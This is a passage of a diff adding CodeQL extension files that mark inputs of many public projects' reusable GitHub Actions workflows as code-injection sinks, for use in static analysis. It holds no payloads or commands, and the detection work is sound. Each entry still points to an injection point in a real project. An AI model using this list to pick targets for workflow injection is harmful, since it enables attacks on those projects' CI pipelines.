"code-injection", "generated"] + - 
["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "input.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "input.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "input.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml new file mode 100644 index 000000000000..4a8e4cc4378e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml new file mode 100644 index 000000000000..803335289524 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml new file mode 100644 index 000000000000..b1a056e28364 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml 
@@ -0,0 +1,29 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.cmake-toolchain", "code-injection", "generated"] + - 
["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "input.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "input.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "input.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml new file mode 100644 index 000000000000..906eb810c89a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml new file mode 100644 index 000000000000..75469b1a80a2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "input.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml new file mode 100644 index 000000000000..192f1d690b5a --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..d8f7648e808f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml new file mode 100644 index 000000000000..9789709eac7e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "input.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "input.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml new file mode 100644 index 000000000000..60e388c076bc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml new file mode 100644 index 000000000000..2cdfb52d976f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml new file mode 100644 index 000000000000..1aae8bd0fd4d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.group", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml new file mode 100644 index 000000000000..c157f1bbca13 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml new file mode 100644 index 000000000000..c7e2c60b08e6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml new file mode 100644 index 000000000000..fa0afdae7691 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "input.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml new file mode 100644 index 000000000000..11a756cc063f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml new file mode 100644 index 000000000000..748d28d75452 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml new file mode 100644 index 000000000000..5916205cea96 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml new file mode 100644 index 000000000000..b62e5e5599f9 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "input.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml new file mode 100644 index 000000000000..6f841faecce8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml new file mode 100644 index 000000000000..3c986e3d00be --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..32de8a5131df --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml new file mode 100644 index 000000000000..a28e8e121d28 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..ed8f60f413ee --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml new file mode 100644 index 000000000000..476d40b52061 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml new file mode 100644 index 000000000000..c8a534d031d7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml new file mode 100644 index 000000000000..5d3b6e2a8845 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml new file mode 100644 index 000000000000..b402ab78ef5c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml new file mode 100644 index 000000000000..2abf8ff1d320 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml new file mode 100644 index 000000000000..4183d01143fd --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml new file mode 100644 index 000000000000..eebeabb0353c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml new file mode 100644 index 000000000000..7279ad6d976f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml new file mode 100644 index 000000000000..ccd29346a108 --- /dev/null +++ 